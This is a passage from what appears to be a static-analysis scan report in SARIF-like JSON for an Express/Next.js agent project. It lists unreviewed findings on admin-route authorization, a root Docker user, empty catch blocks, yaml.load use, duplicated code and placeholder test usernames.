Endpoint: GET /git/log."}, "properties": {"repobilityId": 10600, "scanner": "repobility-access-control", "fingerprint": "1fad7538b3822adbcddcb0fba8b1ebcd0955d09a1f80e021c56d37067d9297bb", "category": "auth", "severity": "medium", "confidence": 0.66, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/git/log", "method": "GET", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2260|cwe-285", "identity_targets": ["unknown", "admin"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2260}}}]}, {"ruleId": "AUC004", "level": "warning", "message": {"text": "[AUC004] Admin route does not show super_admin separation: An administrative route was detected without nearby evidence that platform super_admin access is separated from tenant/application admin access. 
Endpoint: POST /git/pull."}, "properties": {"repobilityId": 10599, "scanner": "repobility-access-control", "fingerprint": "08d4cb7338ff235584b9da416f20e60b817e3cd18164cc116d2e1a340c209f29", "category": "auth", "severity": "medium", "confidence": 0.66, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/git/pull", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2248|cwe-285", "identity_targets": ["unknown", "admin"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2248}}}]}, {"ruleId": "AUC004", "level": "warning", "message": {"text": "[AUC004] Admin route does not show super_admin separation: An administrative route was detected without nearby evidence that platform super_admin access is separated from tenant/application admin access. 
Endpoint: POST /git/push."}, "properties": {"repobilityId": 10598, "scanner": "repobility-access-control", "fingerprint": "4ba1247657e5a6f0755963c4c11adbb123a2710e3743f8ae1b09ad7c70268ebb", "category": "auth", "severity": "medium", "confidence": 0.66, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/git/push", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2225|cwe-285", "identity_targets": ["unknown", "admin"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2225}}}]}, {"ruleId": "AUC004", "level": "warning", "message": {"text": "[AUC004] Admin route does not show super_admin separation: An administrative route was detected without nearby evidence that platform super_admin access is separated from tenant/application admin access. 
Endpoint: POST /git/commit."}, "properties": {"repobilityId": 10597, "scanner": "repobility-access-control", "fingerprint": "3f2dcbea658c27092124e05b2d06ac72d68b170f9177a22e30d321908265fc1e", "category": "auth", "severity": "medium", "confidence": 0.66, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/git/commit", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2211|cwe-285", "identity_targets": ["unknown", "admin"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2211}}}]}, {"ruleId": "AUC004", "level": "warning", "message": {"text": "[AUC004] Admin route does not show super_admin separation: An administrative route was detected without nearby evidence that platform super_admin access is separated from tenant/application admin access. 
Endpoint: GET /git/status."}, "properties": {"repobilityId": 10596, "scanner": "repobility-access-control", "fingerprint": "b6d69eb01cc1604baac494a69a35bdf05493ae5675253dfa6ee9a9ddcafbff48", "category": "auth", "severity": "medium", "confidence": 0.66, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/git/status", "method": "GET", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2200|cwe-285", "identity_targets": ["anonymous", "authenticated"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2200}}}]}, {"ruleId": "AUC004", "level": "warning", "message": {"text": "[AUC004] Admin route does not show super_admin separation: An administrative route was detected without nearby evidence that platform super_admin access is separated from tenant/application admin access. 
Endpoint: POST /backups."}, "properties": {"repobilityId": 10595, "scanner": "repobility-access-control", "fingerprint": "1b97050bd8f11a0dd7708b629f112fe2ecdc3d11280c36ae228174d20f7ebd57", "category": "auth", "severity": "medium", "confidence": 0.66, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/backups", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2146|cwe-285", "identity_targets": ["unknown", "admin"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2146}}}]}, {"ruleId": "AUC004", "level": "warning", "message": {"text": "[AUC004] Admin route does not show super_admin separation: An administrative route was detected without nearby evidence that platform super_admin access is separated from tenant/application admin access. 
Endpoint: GET /backups."}, "properties": {"repobilityId": 10594, "scanner": "repobility-access-control", "fingerprint": "80ce5a4190f0a4f72a82258ff12863570af1b6fa8f865ac9867e9d5b21a704de", "category": "auth", "severity": "medium", "confidence": 0.66, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/backups", "method": "GET", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2136|cwe-285", "identity_targets": ["unknown", "admin"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2136}}}]}, {"ruleId": "AUC004", "level": "warning", "message": {"text": "[AUC004] Admin route does not show super_admin separation: An administrative route was detected without nearby evidence that platform super_admin access is separated from tenant/application admin access. 
Endpoint: GET /health."}, "properties": {"repobilityId": 10593, "scanner": "repobility-access-control", "fingerprint": "2d571c79d579bd8b85dd3c0ba040969e3ffe53fc57b2d5586b2f7694ce0564dd", "category": "auth", "severity": "medium", "confidence": 0.66, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/health", "method": "GET", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|1091|cwe-285", "identity_targets": ["anonymous", "authenticated"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 1091}}}]}, {"ruleId": "AUC004", "level": "warning", "message": {"text": "[AUC004] Admin route does not show super_admin separation: An administrative route was detected without nearby evidence that platform super_admin access is separated from tenant/application admin access. 
Endpoint: POST /gh-check/verify-nonce."}, "properties": {"repobilityId": 10592, "scanner": "repobility-access-control", "fingerprint": "2687e6e20a7f1883f4cabb771d995e2fa95462ece9322d6a0206e623b5e4515e", "category": "auth", "severity": "medium", "confidence": 0.66, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/gh-check/verify-nonce", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|token|245|cwe-285", "identity_targets": ["authenticated", "admin"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/worktreeRoutes.ts"}, "region": {"startLine": 245}}}]}, {"ruleId": "AUC004", "level": "warning", "message": {"text": "[AUC004] Admin route does not show super_admin separation: An administrative route was detected without nearby evidence that platform super_admin access is separated from tenant/application admin access. 
Endpoint: POST /worktrees/resolve."}, "properties": {"repobilityId": 10591, "scanner": "repobility-access-control", "fingerprint": "b3436c6b997611223ae076b23e69c5d4c183c44451f026abf35167e6ff96d4fe", "category": "auth", "severity": "medium", "confidence": 0.66, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/worktrees/resolve", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|token|108|cwe-285", "identity_targets": ["unknown", "admin"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/worktreeRoutes.ts"}, "region": {"startLine": 108}}}]}, {"ruleId": "AUC002", "level": "warning", "message": {"text": "[AUC002] Low visible authorization coverage in route inventory: Only 22.5% of discovered routes show nearby authentication, authorization, middleware, or public-route evidence."}, "properties": {"repobilityId": 10580, "scanner": "repobility-access-control", "fingerprint": "d495f45a32bb70be080c9fa6d59b9dbb88edf864ca255a9121ced3bec4d1581a", "category": "auth", "severity": "medium", "confidence": 0.74, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"scanner": "repobility-access-control", "endpoint_count": 489, "correlation_key": "fp|d495f45a32bb70be080c9fa6d59b9dbb88edf864ca255a9121ced3bec4d1581a", "auth_visible_percent": 22.5}}}, {"ruleId": "AUC001", "level": "warning", "message": {"text": "[AUC001] No Repobility access matrix policy found: The repository uses web/API frameworks but does not define .repobility/access.yml or equivalent authorization documentation."}, "properties": {"repobilityId": 10579, "scanner": "repobility-access-control", "fingerprint": "f1305052c3ba1e6c1cdb5dccc19e58a8168cf78b176658f32b1fc823df3e9d10", 
"category": "auth", "severity": "medium", "confidence": 0.92, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"scanner": "repobility-access-control", "frameworks": ["Express", "Next.js"], "expected_files": [".repobility/access.yml", ".repobility/access.yaml", ".repobility/access.json", ".repobility/authorization.yml"], "correlation_key": "fp|f1305052c3ba1e6c1cdb5dccc19e58a8168cf78b176658f32b1fc823df3e9d10"}}}, {"ruleId": "DKR001", "level": "warning", "message": {"text": "Docker final stage has no non-root USER"}, "properties": {"repobilityId": 10577, "scanner": "repobility-docker", "fingerprint": "4306cac7c08e557fda9a3a460feb993f625449abce49233ecd9cca85fdb43bfa", "category": "docker", "severity": "medium", "confidence": 0.82, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "No USER directive was found in the final runtime stage.", "evidence": {"rule_id": "DKR001", "scanner": "repobility-docker", "final_base": "node:22-alpine", "references": ["https://docs.docker.com/develop/develop-images/dockerfile_best-practices/", "https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html", "https://github.com/hadolint/hadolint"], "correlation_key": "fp|4306cac7c08e557fda9a3a460feb993f625449abce49233ecd9cca85fdb43bfa"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "Dockerfile.relay"}, "region": {"startLine": 26}}}]}, {"ruleId": "ERR002", "level": "warning", "message": {"text": "[ERR002] Empty Catch Block: Empty catch blocks hide errors."}, "properties": {"repobilityId": 10574, "scanner": "repobility-threat-engine", "fingerprint": "c9f832c5ebfe2b0d578e45eb4f3f19ff1018445419168d080eec871f9b4970d7", "category": "error_handling", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", 
"evidence": {"match": ".catch(() => {})", "reason": "Pattern matched with no mitigating context found", "rule_id": "ERR002", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|c9f832c5ebfe2b0d578e45eb4f3f19ff1018445419168d080eec871f9b4970d7"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/messaging/WhatsAppAdapter.ts"}, "region": {"startLine": 329}}}]}, {"ruleId": "ERR002", "level": "warning", "message": {"text": "[ERR002] Empty Catch Block: Empty catch blocks hide errors."}, "properties": {"repobilityId": 10573, "scanner": "repobility-threat-engine", "fingerprint": "681be3b7f8fe6ac8aa5407bd7b2b4b5cb4a7c0fe09f17d06d0a1d937ac189004", "category": "error_handling", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": ".catch(() => {})", "reason": "Pattern matched with no mitigating context found", "rule_id": "ERR002", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|681be3b7f8fe6ac8aa5407bd7b2b4b5cb4a7c0fe09f17d06d0a1d937ac189004"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/messaging/TelegramAdapter.ts"}, "region": {"startLine": 487}}}]}, {"ruleId": "ERR002", "level": "warning", "message": {"text": "[ERR002] Empty Catch Block: Empty catch blocks hide errors."}, "properties": {"repobilityId": 10572, "scanner": "repobility-threat-engine", "fingerprint": "d083d6f04f8b99b3fdf09466753084e86b0028756ba9cdbfae5a5dc27448a15c", "category": "error_handling", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": ".catch(() => {})", "reason": "Pattern matched with no mitigating context found", "rule_id": "ERR002", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": 
"fp|d083d6f04f8b99b3fdf09466753084e86b0028756ba9cdbfae5a5dc27448a15c"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/core/DispatchExecutor.ts"}, "region": {"startLine": 373}}}]}, {"ruleId": "SEC007", "level": "warning", "message": {"text": "[SEC007] Unsafe Deserialization: Unsafe deserialization can execute arbitrary code. Pattern-only match on yaml.load( in a TypeScript file: with js-yaml 4.x, load() uses a safe default schema, whereas js-yaml 3.x load() accepted JavaScript-specific tags; confirm the YAML library, its version and whether the parsed input is untrusted before acting on this result."}, "properties": {"repobilityId": 10571, "scanner": "repobility-threat-engine", "fingerprint": "b772fdd541d24199584fe81bab2b420a07860e137f5cf65fcd95f63d06c876e9", "category": "deserialization", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "yaml.load(", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC007", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "code|deserialization|src/commands/jobmigrate.ts|110|sec007"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/commands/jobMigrate.ts"}, "region": {"startLine": 110}}}]}, {"ruleId": "SEC007", "level": "warning", "message": {"text": "[SEC007] Unsafe Deserialization: Unsafe deserialization can execute arbitrary code. Pattern-only match on yaml.load( in a TypeScript file: with js-yaml 4.x, load() uses a safe default schema, whereas js-yaml 3.x load() accepted JavaScript-specific tags; confirm the YAML library, its version and whether the parsed input is untrusted before acting on this result."}, "properties": {"repobilityId": 10570, "scanner": "repobility-threat-engine", "fingerprint": "e0d7d5969e530c4126e28d2b3c7beee6d48e7aa2a1c604f2c514fd50e3d17aa9", "category": "deserialization", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "yaml.load(", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC007", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "code|deserialization|token|715|sec007"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/scheduler/AgentMdJobLoader.ts"}, "region": {"startLine": 715}}}]}, 
{"ruleId": "SEC007", "level": "warning", "message": {"text": "[SEC007] Unsafe Deserialization: Unsafe deserialization can execute arbitrary code. Pattern-only match on yaml.load( in a TypeScript file: with js-yaml 4.x, load() uses a safe default schema, whereas js-yaml 3.x load() accepted JavaScript-specific tags; confirm the YAML library, its version and whether the parsed input is untrusted before acting on this result."}, "properties": {"repobilityId": 10569, "scanner": "repobility-threat-engine", "fingerprint": "4cea98390767a014c821ab6c690b663ad3c89e808eceb5c44af9904b134f0dac", "category": "deserialization", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "yaml.load(", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC007", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "code|deserialization|token|151|sec007"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/scheduler/InstallBuiltinJobs.ts"}, "region": {"startLine": 151}}}]}, {"ruleId": "ERR001", "level": "warning", "message": {"text": "[ERR001] Silent Exception Swallowing: Silently swallowing all exceptions hides bugs. 
Even in cleanup code, log at DEBUG level."}, "properties": {"repobilityId": 10566, "scanner": "repobility-threat-engine", "fingerprint": "3412c877b09b31cab080939f0cde1faeb526a407044ac1cc900f4409c890eb7a", "category": "error_handling", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "except Exception:\n        pass", "reason": "Pattern matched with no mitigating context found", "rule_id": "ERR001", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|3412c877b09b31cab080939f0cde1faeb526a407044ac1cc900f4409c890eb7a"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "playbook-scripts/playbook-failsafe.py"}, "region": {"startLine": 171}}}]}, {"ruleId": "ERR001", "level": "warning", "message": {"text": "[ERR001] Silent Exception Swallowing: Silently swallowing all exceptions hides bugs. Even in cleanup code, log at DEBUG level."}, "properties": {"repobilityId": 10565, "scanner": "repobility-threat-engine", "fingerprint": "e85adf6332fe533d8d76173ccfb38ece32fd081688498da70bcafbc08728e87a", "category": "error_handling", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "except Exception:\n                pass", "reason": "Pattern matched with no mitigating context found", "rule_id": "ERR001", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|e85adf6332fe533d8d76173ccfb38ece32fd081688498da70bcafbc08728e87a"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "playbook-scripts/playbook-retirement.py"}, "region": {"startLine": 169}}}]}, {"ruleId": "ERR001", "level": "warning", "message": {"text": "[ERR001] Silent Exception Swallowing: Silently swallowing all exceptions hides bugs. 
Even in cleanup code, log at DEBUG level."}, "properties": {"repobilityId": 10564, "scanner": "repobility-threat-engine", "fingerprint": "812a2910376167b1d1a49a07ac0f1b57249117e4396437720ce82b5900ab7013", "category": "error_handling", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "except Exception:\n            pass", "reason": "Pattern matched with no mitigating context found", "rule_id": "ERR001", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|812a2910376167b1d1a49a07ac0f1b57249117e4396437720ce82b5900ab7013"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "playbook-scripts/build-state.py"}, "region": {"startLine": 192}}}]}, {"ruleId": "AGT012", "level": "warning", "message": {"text": "Agent control bridge may listen on a network interface without visible auth"}, "properties": {"repobilityId": 10555, "scanner": "repobility-agent-runtime", "fingerprint": "8fa0ffa5769e25320a695e63d130e69318ebc8c6a41b5d6a81fa9c38b9d58006", "category": "quality", "severity": "medium", "confidence": 0.72, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "File combines agent-control wording with an HTTP/SSE/WebSocket listener on an all-interface host and no visible auth guard.", "evidence": {"rule_id": "AGT012", "scanner": "repobility-agent-runtime", "references": [], "correlation_key": "fp|8fa0ffa5769e25320a695e63d130e69318ebc8c6a41b5d6a81fa9c38b9d58006"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/core/FeedbackManager.ts"}, "region": {"startLine": 69}}}]}, {"ruleId": "AGT012", "level": "warning", "message": {"text": "Agent control bridge may listen on a network interface without visible auth"}, "properties": {"repobilityId": 10554, "scanner": "repobility-agent-runtime", "fingerprint": 
"a856c8896aaf18e874c9f66d38b15c3c545492aa54ccaa9eb8f217e60b050b57", "category": "quality", "severity": "medium", "confidence": 0.72, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "File combines agent-control wording with an HTTP/SSE/WebSocket listener on an all-interface host and no visible auth guard.", "evidence": {"rule_id": "AGT012", "scanner": "repobility-agent-runtime", "references": [], "correlation_key": "fp|a856c8896aaf18e874c9f66d38b15c3c545492aa54ccaa9eb8f217e60b050b57"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/core/DispatchManager.ts"}, "region": {"startLine": 135}}}]}, {"ruleId": "AGT013", "level": "warning", "message": {"text": "Agent auto-approve or skip-permissions mode is easy to enable"}, "properties": {"repobilityId": 10553, "scanner": "repobility-agent-runtime", "fingerprint": "4c7215988540a4da7c1d34aeb83bf56f2885f5926440d34bc3f5e55621f75c85", "category": "quality", "severity": "medium", "confidence": 0.68, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "File exposes or configures a broad agent auto-approval mode without enough local guard wording.", "evidence": {"rule_id": "AGT013", "scanner": "repobility-agent-runtime", "references": [], "correlation_key": "fp|4c7215988540a4da7c1d34aeb83bf56f2885f5926440d34bc3f5e55621f75c85"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "skills/instar-session/SKILL.md"}, "region": {"startLine": 48}}}]}, {"ruleId": "AIC003", "level": "warning", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 10552, "scanner": "repobility-ai-code-hygiene", "fingerprint": "ad11323296de4bd1601fcd34fa65bf907af09b7a2b89ee213876cb17b8169ed6", "category": "quality", "severity": "medium", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": 
{"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/monitoring/OrphanProcessReaper.ts", "duplicate_line": 403, "correlation_key": "fp|ad11323296de4bd1601fcd34fa65bf907af09b7a2b89ee213876cb17b8169ed6"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/monitoring/SessionWatchdog.ts"}, "region": {"startLine": 499}}}]}, {"ruleId": "AIC003", "level": "warning", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 10551, "scanner": "repobility-ai-code-hygiene", "fingerprint": "52efad3c381200bd8e095b64b0356a10c600959f3ee0fd86847a475741131db1", "category": "quality", "severity": "medium", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/config/LiveConfig.ts", "duplicate_line": 140, "correlation_key": "fp|52efad3c381200bd8e095b64b0356a10c600959f3ee0fd86847a475741131db1"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/monitoring/CommitmentTracker.ts"}, "region": {"startLine": 837}}}]}, {"ruleId": "AIC003", "level": "warning", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 10550, "scanner": "repobility-ai-code-hygiene", "fingerprint": "1ff31f2c36b90baf798c1feacc3b69eea3fc404d92c7cf42fd4bbb5a96cd5250", "category": "quality", "severity": "medium", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": 
"src/core/CoherenceReviewer.ts", "duplicate_line": 74, "correlation_key": "fp|1ff31f2c36b90baf798c1feacc3b69eea3fc404d92c7cf42fd4bbb5a96cd5250"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/core/reviewers/escalation-resolution.ts"}, "region": {"startLine": 86}}}]}, {"ruleId": "AIC003", "level": "warning", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 10549, "scanner": "repobility-ai-code-hygiene", "fingerprint": "1ee5850fee271b892f6f0b6b98e7db6a0df82637abe4e844aff37ba51e2d6ae4", "category": "quality", "severity": "medium", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/core/GlobalSecretStore.ts", "duplicate_line": 240, "correlation_key": "fp|1ee5850fee271b892f6f0b6b98e7db6a0df82637abe4e844aff37ba51e2d6ae4"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/core/SecretStore.ts"}, "region": {"startLine": 78}}}]}, {"ruleId": "AIC003", "level": "warning", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 10548, "scanner": "repobility-ai-code-hygiene", "fingerprint": "329e6354aba911af7e594068e429095ca2e362fc8dae93834dafb3b355dced03", "category": "quality", "severity": "medium", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/core/AutoDispatcher.ts", "duplicate_line": 530, "correlation_key": "fp|329e6354aba911af7e594068e429095ca2e362fc8dae93834dafb3b355dced03"}}, 
"locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/core/AutoUpdater.ts"}, "region": {"startLine": 437}}}]}, {"ruleId": "AIC003", "level": "warning", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 10547, "scanner": "repobility-ai-code-hygiene", "fingerprint": "559eb98837aacafdba3fe583266ad0e646a1fa5360c347191e0be643531c0655", "category": "quality", "severity": "medium", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "playbook-scripts/playbook-migrate-lessons.py", "duplicate_line": 256, "correlation_key": "fp|559eb98837aacafdba3fe583266ad0e646a1fa5360c347191e0be643531c0655"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "playbook-scripts/playbook-offline-adapt.py"}, "region": {"startLine": 186}}}]}, {"ruleId": "AIC003", "level": "warning", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 10546, "scanner": "repobility-ai-code-hygiene", "fingerprint": "3dbba48291098ea987259f311e427b3ba66ae1b2e034214b120e8b71f6b7bd88", "category": "quality", "severity": "medium", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": ".instar/hooks/instar/claim-intercept-response.js", "duplicate_line": 7, "correlation_key": "fp|3dbba48291098ea987259f311e427b3ba66ae1b2e034214b120e8b71f6b7bd88"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": ".instar/hooks/instar/claim-intercept.js"}, 
"region": {"startLine": 7}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22097, "scanner": "repobility", "fingerprint": "4f9be3a9546f416ded860139ddce8281", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/sync-lifecycle.test.ts"}, "region": {"startLine": 43}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22096, "scanner": "repobility", "fingerprint": "3c5f4f4c2dfc12bd7d220229c7d92300", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/sync-lifecycle.test.ts"}, "region": {"startLine": 34}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22095, "scanner": "repobility", "fingerprint": "9018b85af7a9a366fe745e92e7c0b860", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/sync-lifecycle.test.ts"}, "region": {"startLine": 32}}}]}, {"ruleId": "QUAL004", 
"level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22094, "scanner": "repobility", "fingerprint": "b2279389b8e729dc462cd8e7aae48c29", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/branch-lifecycle.test.ts"}, "region": {"startLine": 46}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22093, "scanner": "repobility", "fingerprint": "22f54632b9566b5e3a9f9b6dbd93741f", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": 